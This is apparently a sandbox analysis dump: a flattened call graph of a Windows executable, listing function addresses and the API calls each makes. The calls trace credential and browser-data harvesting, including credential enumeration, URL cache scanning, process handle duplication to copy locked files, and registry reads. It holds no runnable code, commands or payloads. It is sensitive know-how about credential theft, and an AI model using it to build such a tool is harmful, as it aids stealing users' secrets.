27 API calls 38197->38198 38199 402c99 38198->38199 38200 40b2cc 27 API calls 38199->38200 38201 402cb3 38200->38201 38202 40b2cc 27 API calls 38201->38202 38203 402cd5 38202->38203 38204 40b2cc 27 API calls 38203->38204 38205 402cf0 38204->38205 38206 40b2cc 27 API calls 38205->38206 38207 402d0b 38206->38207 38208 40b2cc 27 API calls 38207->38208 38209 402d26 38208->38209 38210 40b2cc 27 API calls 38209->38210 38211 402d3e 38210->38211 38212 40b2cc 27 API calls 38211->38212 38213 402d59 38212->38213 38214 40b2cc 27 API calls 38213->38214 38215 402d78 38214->38215 38216 40b2cc 27 API calls 38215->38216 38217 402d93 38216->38217 38218 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38217->38218 38218->38101 38219->38091 38223 40b58d 38220->38223 38222 40b2d1 38222->38165 38224 40b5a4 GetModuleHandleW FindResourceW 38223->38224 38225 40b62e 38223->38225 38226 40b5c2 LoadResource 38224->38226 38228 40b5e7 38224->38228 38225->38222 38227 40b5d0 SizeofResource LockResource 38226->38227 38226->38228 38227->38228 38228->38225 38236 40afcf 38228->38236 38230 40b608 memcpy 38239 40b4d3 memcpy 38230->38239 38232 40b61e 38240 40b3c1 18 API calls 38232->38240 38234 40b626 38241 40b04b 38234->38241 38237 40b04b ??3@YAXPAX 38236->38237 38238 40afd7 ??2@YAPAXI 38237->38238 38238->38230 38239->38232 38240->38234 38242 40b051 ??3@YAXPAX 38241->38242 38243 40b05f 38241->38243 38242->38243 38243->38225 38244->38109 38246 4032c4 38245->38246 38247 40b633 free 38246->38247 38248 403316 38247->38248 38267 44553b 38248->38267 38252 403480 38465 40368c 15 API calls 38252->38465 38254 403489 38255 40b633 free 38254->38255 38257 403495 38255->38257 38256 40333c 38256->38252 38258 4033a9 memset memcpy 38256->38258 38259 4033ec wcscmp 38256->38259 38463 4028e7 11 API calls 38256->38463 38464 40f508 6 API calls 38256->38464 38257->38111 38258->38256 38258->38259 38259->38256 38262 403421 _wcsicmp 38262->38256 38264 444a64 FreeLibrary 38263->38264 38265 444a83 38263->38265 38264->38265 38265->38111 38266->38112 38268 445548 38267->38268 38269 445599 38268->38269 38466 40c768 38268->38466 38270 4455a8 memset 38269->38270 38277 4457f2 38269->38277 38549 403988 38270->38549 38280 445854 38277->38280 38651 403e2d memset memset memset memset memset 38277->38651 38278 4455e5 38289 445672 38278->38289 38294 44560f 38278->38294 38279 4458bb memset memset 38282 414c2e 17 API calls 38279->38282 38333 4458aa 38280->38333 38674 403c9c memset memset memset memset memset 38280->38674 38285 4458f9 38282->38285 38284 44595e memset memset 38292 414c2e 17 API calls 38284->38292 38293 40b2cc 27 API calls 38285->38293 38287 44558c 38533 444b06 38287->38533 38288 44557a 38288->38287 38747 4136c0 CoTaskMemFree 38288->38747 38560 403fbe memset memset memset memset memset 38289->38560 38290 445a00 memset memset 38697 414c2e 38290->38697 38291 445b22 38297 445bca 38291->38297 38298 445b38 memset memset memset 38291->38298 38302 44599c 38292->38302 38304 445909 38293->38304 38306 4087b3 338 API calls 38294->38306 38296 445849 38763 40b1ab free free 38296->38763 38305 445c8b memset memset 38297->38305 38371 445cf0 38297->38371 38309 445bd4 38298->38309 38310 445b98 38298->38310 38303 40b2cc 27 API calls 38302->38303 38317 4459ac 38303->38317 38314 409d1f 6 API calls 38304->38314 38318 414c2e 17 API calls 38305->38318 38315 445621 38306->38315 38307 44589f 38764 40b1ab free free 38307->38764 38308 445585 38748 41366b FreeLibrary 38308->38748 38324 414c2e 17 API calls 38309->38324 38310->38309 38320 445ba2 38310->38320 38313 403335 38462 4452e5 45 API calls 38313->38462 38328 445919 38314->38328 38749 4454bf 20 API calls 38315->38749 38316 445823 38316->38296 38338 4087b3 338 API calls 38316->38338 38329 409d1f 6 API calls 38317->38329 38330 445cc9 38318->38330 38836 4099c6 wcslen 38320->38836 38321 4456b2 38751 40b1ab free free 38321->38751 38323 40b2cc 27 API calls 38334 445a4f 38323->38334 38325 445be2 38324->38325 38336 40b2cc 27 API calls 38325->38336 38326 445d3d 38356 40b2cc 27 API calls 38326->38356 38327 445d88 memset memset memset 38339 414c2e 17 API calls 38327->38339 38765 409b98 GetFileAttributesW 38328->38765 38340 4459bc 38329->38340 38341 409d1f 6 API calls 38330->38341 38331 445879 38331->38307 38352 4087b3 338 API calls 38331->38352 38333->38279 38357 44594a 38333->38357 38713 409d1f wcslen wcslen 38334->38713 38346 445bf3 38336->38346 38338->38316 38349 445dde 38339->38349 38832 409b98 GetFileAttributesW 38340->38832 38351 445ce1 38341->38351 38342 445bb3 38839 445403 memset 38342->38839 38343 445680 38343->38321 38583 4087b3 memset 38343->38583 38355 409d1f 6 API calls 38346->38355 38347 445928 38347->38357 38766 40b6ef 38347->38766 38358 40b2cc 27 API calls 38349->38358 38856 409b98 GetFileAttributesW 38351->38856 38352->38331 38354 40b2cc 27 API calls 38363 445a94 38354->38363 38365 445c07 38355->38365 38366 445d54 _wcsicmp 38356->38366 38357->38284 38370 4459ed 38357->38370 38369 445def 38358->38369 38359 4459cb 38359->38370 38379 40b6ef 253 API calls 38359->38379 38718 40ae18 38363->38718 38364 44566d 38364->38277 38634 413d4c 38364->38634 38375 445389 259 API calls 38365->38375 38376 445d71 38366->38376 38439 445d67 38366->38439 38368 445665 38750 40b1ab free free 38368->38750 38377 409d1f 6 API calls 38369->38377 38370->38290 38370->38291 38371->38313 38371->38326 38371->38327 38372 445389 259 API calls 38372->38297 38381 445c17 38375->38381 38857 445093 23 API calls 38376->38857 38384 445e03 38377->38384 38379->38370 38380 4456d8 38386 40b2cc 27 API calls 38380->38386 38387 40b2cc 27 API calls 38381->38387 38383 44563c 38383->38368 38389 4087b3 338 API calls 38383->38389 38858 409b98 GetFileAttributesW 38384->38858 38385 40b6ef 253 API calls 38385->38313 38391 4456e2 38386->38391 38392 445c23 38387->38392 38388 445d83 38388->38313 38389->38383 38752 413fa6 _wcsicmp _wcsicmp 38391->38752 38396 409d1f 6 API calls 38392->38396 38394 445e12 38401 445e6b 38394->38401 38408 40b2cc 27 API calls 38394->38408 38399 445c37 38396->38399 38397 445aa1 38400 445b17 38397->38400 38415 445ab2 memset 38397->38415 38428 409d1f 6 API calls 38397->38428 38725 40add4 38397->38725 38730 445389 38397->38730 38739 40ae51 38397->38739 38398 4456eb 38404 4456fd memset memset memset memset 38398->38404 38405 4457ea 38398->38405 38406 445389 259 API calls 38399->38406 38833 40aebe 38400->38833 38860 445093 23 API calls 38401->38860 38753 409c70 wcscpy wcsrchr 38404->38753 38756 413d29 38405->38756 38411 445c47 38406->38411 38412 445e33 38408->38412 38409 445e7e 38414 445f67 38409->38414 38417 40b2cc 27 API calls 38411->38417 38418 409d1f 6 API calls 38412->38418 38423 40b2cc 27 API calls 38414->38423 38419 40b2cc 27 API calls 38415->38419 38421 445c53 38417->38421 38422 445e47 38418->38422 38419->38397 38420 409c70 2 API calls 38424 44577e 38420->38424 38425 409d1f 6 API calls 38421->38425 38859 409b98 GetFileAttributesW 38422->38859 38427 445f73 38423->38427 38429 409c70 2 API calls 38424->38429 38430 445c67 38425->38430 38432 409d1f 6 API calls 38427->38432 38428->38397 38433 44578d 38429->38433 38434 445389 259 API calls 38430->38434 38431 445e56 38431->38401 38437 445e83 memset 38431->38437 38435 445f87 38432->38435 38433->38405 38441 40b2cc 27 API calls 38433->38441 38434->38297 38863 409b98 GetFileAttributesW 38435->38863 38440 40b2cc 27 API calls 38437->38440 38439->38313 38439->38385 38442 445eab 38440->38442 38443 4457a8 38441->38443 38444 409d1f 6 API calls 38442->38444 38445 409d1f 6 API calls 38443->38445 38446 445ebf 38444->38446 38447 4457b8 38445->38447 38448 40ae18 9 API calls 38446->38448 38755 409b98 GetFileAttributesW 38447->38755 38458 445ef5 38448->38458 38450 4457c7 38450->38405 38452 4087b3 338 API calls 38450->38452 38451 40ae51 9 API calls 38451->38458 38452->38405 38453 445f5c 38455 40aebe FindClose 38453->38455 38454 40add4 2 API calls 38454->38458 38455->38414 38456 40b2cc 27 API calls 38456->38458 38457 409d1f 6 API calls 38457->38458 38458->38451 38458->38453 38458->38454 38458->38456 38458->38457 38460 445f3a 38458->38460 38861 409b98 GetFileAttributesW 38458->38861 38862 445093 23 API calls 38460->38862 38462->38256 38463->38262 38464->38256 38465->38254 38467 40c775 38466->38467 38864 40b1ab free free 38467->38864 38469 40c788 38865 40b1ab free free 38469->38865 38471 40c790 38866 40b1ab free free 38471->38866 38473 40c798 38474 40aa04 free 38473->38474 38475 40c7a0 38474->38475 38867 40c274 memset 38475->38867 38480 40a8ab 9 API calls 38481 40c7c3 38480->38481 38482 40a8ab 9 API calls 38481->38482 38483 40c7d0 38482->38483 38896 40c3c3 38483->38896 38487 40c877 38496 40bdb0 38487->38496 38488 40c86c 38938 4053fe 39 API calls 38488->38938 38494 40c7e5 38494->38487 38494->38488 38495 40c634 50 API calls 38494->38495 38921 40a706 38494->38921 38495->38494 39167 404363 38496->39167 38499 40bf5d 39187 40440c 38499->39187 38500 40bdee 38500->38499 38504 40b2cc 27 API calls 38500->38504 38501 40bddf CredEnumerateW 38501->38500 38505 40be02 wcslen 38504->38505 38505->38499 38510 40be1e 38505->38510 38506 40be26 wcsncmp 38506->38510 38509 40be7d memset 38509->38510 38511 40bea7 memcpy 38509->38511 38510->38499 38510->38506 38510->38509 38510->38511 38512 40bf11 wcschr 38510->38512 38513 40b2cc 27 API calls 38510->38513 38515 40bf43 LocalFree 38510->38515 39190 40bd5d 28 API calls 38510->39190 39191 404423 38510->39191 38511->38510 38511->38512 38512->38510 38514 40bef6 _wcsnicmp 38513->38514 38514->38510 38514->38512 38515->38510 38516 4135f7 39206 4135e0 38516->39206 38519 40b2cc 27 API calls 38520 41360d 38519->38520 38521 40a804 8 API calls 38520->38521 38522 413613 38521->38522 38523 41361b 38522->38523 38524 41363e 38522->38524 38525 40b273 27 API calls 38523->38525 38526 4135e0 FreeLibrary 38524->38526 38527 413625 GetProcAddress 38525->38527 38528 413643 38526->38528 38527->38524 38529 413648 38527->38529 38528->38288 38530 413658 38529->38530 38531 4135e0 FreeLibrary 38529->38531 38530->38288 38532 413666 38531->38532 38532->38288 39209 4449b9 38533->39209 38536 444c1f 38536->38269 38537 4449b9 42 API calls 38539 444b4b 38537->38539 38538 444c15 38541 4449b9 42 API calls 38538->38541 38539->38538 39230 444972 GetVersionExW 38539->39230 38541->38536 38542 444b99 memcmp 38547 444b8c 38542->38547 38543 444c0b 39234 444a85 42 API calls 38543->39234 38547->38542 38547->38543 39231 444aa5 42 API calls 38547->39231 39232 40a7a0 GetVersionExW 38547->39232 39233 444a85 42 API calls 38547->39233 38550 40399d 38549->38550 39235 403a16 38550->39235 38552 403a09 39249 40b1ab free free 38552->39249 38554 403a12 wcsrchr 38554->38278 38555 4039a3 38555->38552 38558 4039f4 38555->38558 39246 40a02c CreateFileW 38555->39246 38558->38552 38559 4099c6 2 API calls 38558->38559 38559->38552 38561 414c2e 17 API calls 38560->38561 38562 404048 38561->38562 38563 414c2e 17 API calls 38562->38563 38564 404056 38563->38564 38565 409d1f 6 API calls 38564->38565 38566 404073 38565->38566 38567 409d1f 6 API calls 38566->38567 38568 40408e 38567->38568 38569 409d1f 6 API calls 38568->38569 38570 4040a6 38569->38570 38571 403af5 20 API calls 38570->38571 38572 4040ba 38571->38572 38573 403af5 20 API calls 38572->38573 38574 4040cb 38573->38574 39276 40414f memset 38574->39276 38576 404140 39290 40b1ab free free 38576->39290 38577 4040ec memset 38581 4040e0 38577->38581 38579 404148 38579->38343 38580 4099c6 2 API calls 38580->38581 38581->38576 38581->38577 38581->38580 38582 40a8ab 9 API calls 38581->38582 38582->38581 39303 40a6e6 WideCharToMultiByte 38583->39303 38585 4087ed 39304 4095d9 memset 38585->39304 38588 408809 memset memset memset memset memset 38589 40b2cc 27 API calls 38588->38589 38590 4088a1 38589->38590 38591 409d1f 6 API calls 38590->38591 38592 4088b1 38591->38592 38593 40b2cc 27 API calls 38592->38593 38594 4088c0 38593->38594 38595 409d1f 6 API calls 38594->38595 38596 4088d0 38595->38596 38597 40b2cc 27 API calls 38596->38597 38598 4088df 38597->38598 38599 409d1f 6 API calls 38598->38599 38615 408953 38615->38343 38635 40b633 free 38634->38635 38636 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38635->38636 38637 413f00 Process32NextW 38636->38637 38638 413da5 OpenProcess 38637->38638 38639 413f17 CloseHandle 38637->38639 38640 413eb0 38638->38640 38641 413df3 memset 38638->38641 38639->38380 38640->38637 38643 413ebf free 38640->38643 38644 4099f4 3 API calls 38640->38644 39744 413f27 38641->39744 38643->38640 38644->38640 38645 413e1f 38646 413e37 GetModuleHandleW 38645->38646 39749 413959 38645->39749 39765 413ca4 38645->39765 38646->38645 38648 413e46 GetProcAddress 38646->38648 38648->38645 38650 413ea2 CloseHandle 38650->38640 38652 414c2e 17 API calls 38651->38652 38653 403eb7 38652->38653 38654 414c2e 17 API calls 38653->38654 38655 403ec5 38654->38655 38656 409d1f 6 API calls 38655->38656 38657 403ee2 38656->38657 38658 409d1f 6 API calls 38657->38658 38659 403efd 38658->38659 38660 409d1f 6 API calls 38659->38660 38661 403f15 38660->38661 38662 403af5 20 API calls 38661->38662 38663 403f29 38662->38663 38664 403af5 20 API calls 38663->38664 38665 403f3a 38664->38665 38666 40414f 33 API calls 38665->38666 38672 403f4f 38666->38672 38667 403faf 39779 40b1ab free free 38667->39779 38669 403f5b memset 38669->38672 38670 403fb7 38670->38316 38671 4099c6 2 API calls 38671->38672 38672->38667 38672->38669 38672->38671 38673 40a8ab 9 API calls 38672->38673 38673->38672 38675 414c2e 17 API calls 38674->38675 38676 403d26 38675->38676 38677 414c2e 17 API calls 38676->38677 38678 403d34 38677->38678 38679 409d1f 6 API calls 38678->38679 38680 403d51 38679->38680 38681 409d1f 6 API calls 38680->38681 38682 403d6c 38681->38682 38683 409d1f 6 API calls 38682->38683 38684 403d84 38683->38684 38685 403af5 20 API calls 38684->38685 38686 403d98 38685->38686 38687 403af5 20 API calls 38686->38687 38688 403da9 38687->38688 38689 40414f 33 API calls 38688->38689 38690 403dbe 38689->38690 38691 403e1e 38690->38691 38693 403dca memset 38690->38693 38695 4099c6 2 API calls 38690->38695 38696 40a8ab 9 API calls 38690->38696 39780 40b1ab free free 38691->39780 38693->38690 38694 403e26 38694->38331 38695->38690 38696->38690 38698 414b81 9 API calls 38697->38698 38699 414c40 38698->38699 38700 414c73 memset 38699->38700 39781 409cea 38699->39781 38702 414c94 38700->38702 39784 414592 RegOpenKeyExW 38702->39784 38705 414c64 SHGetSpecialFolderPathW 38707 414d0b 38705->38707 38706 414cc1 38708 414cf4 wcscpy 38706->38708 39785 414bb0 wcscpy 38706->39785 38707->38323 38708->38707 38710 414cd2 39786 4145ac RegQueryValueExW 38710->39786 38712 414ce9 RegCloseKey 38712->38708 38714 409d62 38713->38714 38715 409d43 wcscpy 38713->38715 38714->38354 38716 409719 2 API calls 38715->38716 38717 409d51 wcscat 38716->38717 38717->38714 38719 40aebe FindClose 38718->38719 38720 40ae21 38719->38720 38721 4099c6 2 API calls 38720->38721 38722 40ae35 38721->38722 38723 409d1f 6 API calls 38722->38723 38724 40ae49 38723->38724 38724->38397 38726 40ade0 38725->38726 38729 40ae0f 38725->38729 38727 40ade7 wcscmp 38726->38727 38726->38729 38728 40adfe wcscmp 38727->38728 38727->38729 38728->38729 38729->38397 38731 40ae18 9 API calls 38730->38731 38732 4453c4 38731->38732 38733 40ae51 9 API calls 38732->38733 38734 4453f3 38732->38734 38735 40add4 2 API calls 38732->38735 38738 445403 254 API calls 38732->38738 38733->38732 38736 40aebe FindClose 38734->38736 38735->38732 38737 4453fe 38736->38737 38737->38397 38738->38732 38740 40ae7b FindNextFileW 38739->38740 38741 40ae5c FindFirstFileW 38739->38741 38742 40ae94 38740->38742 38743 40ae8f 38740->38743 38741->38742 38745 40aeb6 38742->38745 38746 409d1f 6 API calls 38742->38746 38744 40aebe FindClose 38743->38744 38744->38742 38745->38397 38746->38745 38747->38308 38748->38287 38749->38383 38750->38364 38751->38364 38752->38398 38754 409c89 38753->38754 38754->38420 38755->38450 38757 413d39 38756->38757 38758 413d2f FreeLibrary 38756->38758 38759 40b633 free 38757->38759 38758->38757 38760 413d42 38759->38760 38761 40b633 free 38760->38761 38762 413d4a 38761->38762 38762->38277 38763->38280 38764->38333 38765->38347 38767 44db70 38766->38767 38768 40b6fc memset 38767->38768 38769 409c70 2 API calls 38768->38769 38770 40b732 wcsrchr 38769->38770 38771 40b743 38770->38771 38772 40b746 memset 38770->38772 38771->38772 38773 40b2cc 27 API calls 38772->38773 38774 40b76f 38773->38774 38775 409d1f 6 API calls 38774->38775 38776 40b783 38775->38776 39787 409b98 GetFileAttributesW 38776->39787 38778 40b792 38779 40b7c2 38778->38779 38780 409c70 2 API calls 38778->38780 39788 40bb98 38779->39788 38782 40b7a5 38780->38782 38784 40b2cc 27 API calls 38782->38784 38788 40b7b2 38784->38788 38785 40b837 CloseHandle 38787 40b83e memset 38785->38787 38786 40b817 38789 409a45 3 API calls 38786->38789 39821 40a6e6 WideCharToMultiByte 38787->39821 38791 409d1f 6 API calls 38788->38791 38792 40b827 CopyFileW 38789->38792 38791->38779 38792->38787 38793 40b866 38794 444432 121 API calls 38793->38794 38795 40b879 38794->38795 38796 40bad5 38795->38796 38797 40b273 27 API calls 38795->38797 38798 40baeb 38796->38798 38799 40bade DeleteFileW 38796->38799 38800 40b89a 38797->38800 38801 40b04b ??3@YAXPAX 38798->38801 38799->38798 38802 438552 134 API calls 38800->38802 38803 40baf3 38801->38803 38804 40b8a4 38802->38804 38803->38357 38805 40bacd 38804->38805 38807 4251c4 137 API calls 38804->38807 38806 443d90 111 API calls 38805->38806 38806->38796 38830 40b8b8 38807->38830 38808 40bac6 39831 424f26 123 API calls 38808->39831 38809 40b8bd memset 39822 425413 17 API calls 38809->39822 38812 425413 17 API calls 38812->38830 38815 40a71b MultiByteToWideChar 38815->38830 38816 40a734 MultiByteToWideChar 38816->38830 38819 40b9b5 memcmp 38819->38830 38820 4099c6 2 API calls 38820->38830 38821 404423 38 API calls 38821->38830 38824 40bb3e memset memcpy 39832 40a734 MultiByteToWideChar 38824->39832 38825 4251c4 137 API calls 38825->38830 38827 40bb88 LocalFree 38827->38830 38830->38808 38830->38809 38830->38812 38830->38815 38830->38816 38830->38819 38830->38820 38830->38821 38830->38824 38830->38825 38831 40ba5f memcmp 38830->38831 39823 4253ef 16 API calls 38830->39823 39824 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38830->39824 39825 4253af 17 API calls 38830->39825 39826 4253cf 17 API calls 38830->39826 39827 447280 memset 38830->39827 39828 447960 memset memcpy memcpy memcpy 38830->39828 39829 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38830->39829 39830 447920 memcpy memcpy memcpy 38830->39830 38831->38830 38832->38359 38834 40aed1 38833->38834 38835 40aec7 FindClose 38833->38835 38834->38291 38835->38834 38837 4099d7 38836->38837 38838 4099da memcpy 38836->38838 38837->38838 38838->38342 38840 40b2cc 27 API calls 38839->38840 38841 44543f 38840->38841 38842 409d1f 6 API calls 38841->38842 38843 44544f 38842->38843 39928 409b98 GetFileAttributesW 38843->39928 38845 44545e 38846 445476 38845->38846 38847 40b6ef 253 API calls 38845->38847 38848 40b2cc 27 API calls 38846->38848 38847->38846 38849 445482 38848->38849 38850 409d1f 6 API calls 38849->38850 38851 445492 38850->38851 39929 409b98 GetFileAttributesW 38851->39929 38853 4454a1 38854 4454b9 38853->38854 38855 40b6ef 253 API calls 38853->38855 38854->38372 38855->38854 38856->38371 38857->38388 38858->38394 38859->38431 38860->38409 38861->38458 38862->38458 38863->38439 38864->38469 38865->38471 38866->38473 38868 414c2e 17 API calls 38867->38868 38869 40c2ae 38868->38869 38939 40c1d3 38869->38939 38874 40c3be 38891 40a8ab 38874->38891 38875 40afcf 2 API calls 38876 40c2fd FindFirstUrlCacheEntryW 38875->38876 38877 40c3b6 38876->38877 38878 40c31e wcschr 38876->38878 38879 40b04b ??3@YAXPAX 38877->38879 38880 40c331 38878->38880 38881 40c35e FindNextUrlCacheEntryW 38878->38881 38879->38874 38883 40a8ab 9 API calls 38880->38883 38881->38878 38882 40c373 GetLastError 38881->38882 38884 40c3ad FindCloseUrlCache 38882->38884 38885 40c37e 38882->38885 38886 40c33e wcschr 38883->38886 38884->38877 38887 40afcf 2 API calls 38885->38887 38886->38881 38888 40c34f 38886->38888 38889 40c391 FindNextUrlCacheEntryW 38887->38889 38890 40a8ab 9 API calls 38888->38890 38889->38878 38889->38884 38890->38881 39094 40a97a 38891->39094 38894 40a8cc 38894->38480 38895 40a8d0 7 API calls 38895->38894 39099 40b1ab free free 38896->39099 38898 40c3dd 38899 40b2cc 27 API calls 38898->38899 38900 40c3e7 38899->38900 39100 414592 RegOpenKeyExW 38900->39100 38902 40c3f4 38903 40c50e 38902->38903 38904 40c3ff 38902->38904 38918 405337 38903->38918 38905 40a9ce 4 API calls 38904->38905 38906 40c418 memset 38905->38906 39101 40aa1d 38906->39101 38909 40c471 38911 40c47a _wcsupr 38909->38911 38910 40c505 RegCloseKey 38910->38903 38912 40a8d0 7 API calls 38911->38912 38913 40c498 38912->38913 38914 40a8d0 7 API calls 38913->38914 38915 40c4ac memset 38914->38915 38916 40aa1d 38915->38916 38917 40c4e4 RegEnumValueW 38916->38917 38917->38910 38917->38911 39103 405220 38918->39103 38922 4099c6 2 API calls 38921->38922 38923 40a714 _wcslwr 38922->38923 38924 40c634 38923->38924 39160 405361 38924->39160 38927 40c65c wcslen 39163 4053b6 39 API calls 38927->39163 38928 40c71d wcslen 38928->38494 38930 40c677 38931 40c713 38930->38931 39164 40538b 39 API calls 38930->39164 39166 4053df 39 API calls 38931->39166 38934 40c6a5 38934->38931 38935 40c6a9 memset 38934->38935 38936 40c6d3 38935->38936 39165 40c589 44 API calls 38936->39165 38938->38487 38940 40ae18 9 API calls 38939->38940 38946 40c210 38940->38946 38941 40ae51 9 API calls 38941->38946 38942 40c264 38943 40aebe FindClose 38942->38943 38945 40c26f 38943->38945 38944 40add4 2 API calls 38944->38946 38951 40e5ed memset memset 38945->38951 38946->38941 38946->38942 38946->38944 38947 40c231 _wcsicmp 38946->38947 38948 40c1d3 35 API calls 38946->38948 38947->38946 38949 40c248 38947->38949 38948->38946 38964 40c084 22 API calls 38949->38964 38952 414c2e 17 API calls 38951->38952 38953 40e63f 38952->38953 38954 409d1f 6 API calls 38953->38954 38955 40e658 38954->38955 38965 409b98 GetFileAttributesW 38955->38965 38957 40e667 38958 40e680 38957->38958 38959 409d1f 6 API calls 38957->38959 38966 409b98 GetFileAttributesW 38958->38966 38959->38958 38961 40e68f 38962 40c2d8 38961->38962 38967 40e4b2 38961->38967 38962->38874 38962->38875 38964->38946 38965->38957 38966->38961 38988 40e01e 38967->38988 38969 40e593 38970 40e5b0 38969->38970 38971 40e59c DeleteFileW 38969->38971 38972 40b04b ??3@YAXPAX 38970->38972 38971->38970 38974 40e5bb 38972->38974 38973 40e521 38973->38969 39011 40e175 38973->39011 38976 40e5c4 CloseHandle 38974->38976 38977 40e5cc 38974->38977 38976->38977 38979 40b633 free 38977->38979 38978 40e573 38980 40e584 38978->38980 38981 40e57c CloseHandle 38978->38981 38982 40e5db 38979->38982 39032 40b1ab free free 38980->39032 38981->38980 38985 40b633 free 38982->38985 38984 40e540 38984->38978 39031 40e2ab 30 API calls 38984->39031 38986 40e5e3 38985->38986 38986->38962 39033 406214 38988->39033 38991 40e16b 38991->38973 38994 40afcf 2 API calls 38995 40e08d OpenProcess 38994->38995 38996 40e0a4 GetCurrentProcess DuplicateHandle 38995->38996 39000 40e152 38995->39000 38997 40e0d0 GetFileSize 38996->38997 38998 40e14a CloseHandle 38996->38998 39069 409a45 GetTempPathW 38997->39069 38998->39000 38999 40e160 39003 40b04b ??3@YAXPAX 38999->39003 39000->38999 39002 406214 22 API calls 39000->39002 39002->38999 39003->38991 39004 40e0ea 39072 4096dc CreateFileW 39004->39072 39006 40e0f1 CreateFileMappingW 39007 40e140 CloseHandle CloseHandle 39006->39007 39008 40e10b MapViewOfFile 39006->39008 39007->38998 39009 40e13b CloseHandle 39008->39009 39010 40e11f WriteFile UnmapViewOfFile 39008->39010 39009->39007 39010->39009 39012 40e18c 39011->39012 39073 406b90 39012->39073 39015 40e1a7 memset 39021 40e1e8 39015->39021 39016 40e299 39083 4069a3 39016->39083 39022 40e283 39021->39022 39023 40dd50 _wcsicmp 39021->39023 39029 40e244 _snwprintf 39021->39029 39090 406e8f 13 API calls 39021->39090 39091 40742e 8 API calls 39021->39091 39092 40aae3 wcslen wcslen _memicmp 39021->39092 39093 406b53 SetFilePointerEx ReadFile 39021->39093 39024 40e291 39022->39024 39025 40e288 free 39022->39025 39023->39021 39026 40aa04 free 39024->39026 39025->39024 39026->39016 39030 40a8d0 7 API calls 39029->39030 39030->39021 39031->38984 39032->38969 39034 406294 CloseHandle 39033->39034 39035 406224 39034->39035 39036 4096c3 CreateFileW 39035->39036 39037 40622d 39036->39037 39038 406281 GetLastError 39037->39038 39039 40a2ef ReadFile 39037->39039 39043 40625a 39038->39043 39040 406244 39039->39040 39040->39038 39041 40624b 39040->39041 39042 406777 19 API calls 39041->39042 39041->39043 39042->39043 39043->38991 39044 40dd85 memset 39043->39044 39045 409bca GetModuleFileNameW 39044->39045 39046 40ddbe CreateFileW 39045->39046 39049 40ddf1 39046->39049 39047 40afcf ??2@YAPAXI ??3@YAXPAX 39047->39049 39048 41352f 9 API calls 39048->39049 39049->39047 39049->39048 39050 40de0b NtQuerySystemInformation 39049->39050 39051 40de3b CloseHandle GetCurrentProcessId 39049->39051 39050->39049 39052 40de54 39051->39052 39053 413d4c 46 API calls 39052->39053 39061 40de88 39053->39061 39054 40e00c 39055 413d29 free FreeLibrary 39054->39055 39056 40e014 39055->39056 39056->38991 39056->38994 39057 40dea9 _wcsicmp 39058 40dee7 OpenProcess 39057->39058 39059 40debd _wcsicmp 39057->39059 39058->39061 39059->39058 39060 40ded0 _wcsicmp 39059->39060 39060->39058 39060->39061 39061->39054 39061->39057 39062 40dfef CloseHandle 39061->39062 39063 40df23 GetCurrentProcess DuplicateHandle 39061->39063 39066 40df8f CloseHandle 39061->39066 39067 40df78 39061->39067 39062->39061 39063->39061 39064 40df4c memset 39063->39064 39065 41352f 9 API calls 39064->39065 39065->39061 39066->39067 39067->39062 39067->39066 39068 40dfae _wcsicmp 39067->39068 39068->39061 39068->39067 39070 409a74 GetTempFileNameW 39069->39070 39071 409a66 GetWindowsDirectoryW 39069->39071 39070->39004 39071->39070 39072->39006 39074 406bd5 39073->39074 39075 406bad 39073->39075 39077 4066bf free malloc memcpy free free 39074->39077 39082 406c0f 39074->39082 39075->39074 39076 406bba _wcsicmp 39075->39076 39076->39074 39076->39075 39078 406be5 39077->39078 39079 40afcf ??2@YAPAXI ??3@YAXPAX 39078->39079 39078->39082 39080 406bff 39079->39080 39081 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39080->39081 39081->39082 39082->39015 39082->39016 39084 4069c4 ??3@YAXPAX 39083->39084 39085 4069af 39084->39085 39086 40b633 free 39085->39086 39087 4069ba 39086->39087 39088 40b04b ??3@YAXPAX 39087->39088 39089 4069c2 39088->39089 39089->38984 39090->39021 39091->39021 39092->39021 39093->39021 39095 40a980 39094->39095 39096 40a8bb 39095->39096 39097 40a995 _wcsicmp 39095->39097 39098 40a99c wcscmp 39095->39098 39096->38894 39096->38895 39097->39095 39098->39095 39099->38898 39100->38902 39102 40aa23 RegEnumValueW 39101->39102 39102->38909 39102->38910 39104 405335 39103->39104 39105 40522a 39103->39105 39104->38494 39106 40b2cc 27 API calls 39105->39106 39107 405234 39106->39107 39108 40a804 8 API calls 39107->39108 39109 40523a 39108->39109 39148 40b273 39109->39148 39111 405248 _mbscpy _mbscat GetProcAddress 39112 40b273 27 API calls 39111->39112 39113 405279 39112->39113 39151 405211 GetProcAddress 39113->39151 39115 405282 39116 40b273 27 API calls 39115->39116 39117 40528f 39116->39117 39152 405211 GetProcAddress 39117->39152 39119 405298 39120 40b273 27 API calls 39119->39120 39121 4052a5 39120->39121 39153 405211 GetProcAddress 39121->39153 39123 4052ae 39124 40b273 27 API calls 39123->39124 39125 4052bb 39124->39125 39154 405211 GetProcAddress 39125->39154 39127 4052c4 39128 40b273 27 API calls 39127->39128 39129 4052d1 39128->39129 39155 405211 GetProcAddress 39129->39155 39131 4052da 39132 40b273 27 API calls 39131->39132 39133 4052e7 39132->39133 39156 405211 GetProcAddress 39133->39156 39135 4052f0 39136 40b273 27 API calls 39135->39136 39137 4052fd 39136->39137 39149 40b58d 27 API calls 39148->39149 39150 40b18c 39149->39150 39150->39111 39151->39115 39152->39119 39153->39123 39154->39127 39155->39131 39156->39135 39161 405220 39 API calls 39160->39161 39162 405369 39161->39162 39162->38927 39162->38928 39163->38930 39164->38934 39165->38931 39166->38928 39168 40440c FreeLibrary 39167->39168 39169 40436d 39168->39169 39170 40a804 8 API calls 39169->39170 39171 404377 39170->39171 39172 404383 39171->39172 39173 404405 39171->39173 39174 40b273 27 API calls 39172->39174 39173->38499 39173->38500 39173->38501 39175 40438d GetProcAddress 39174->39175 39176 40b273 27 API calls 39175->39176 39177 4043a7 GetProcAddress 39176->39177 39178 40b273 27 API calls 39177->39178 39179 4043ba GetProcAddress 39178->39179 39180 40b273 27 API calls 39179->39180 39181 4043ce GetProcAddress 39180->39181 39182 40b273 27 API calls 39181->39182 39183 4043e2 GetProcAddress 39182->39183 39184 4043f1 39183->39184 39185 4043f7 39184->39185 39186 40440c FreeLibrary 39184->39186 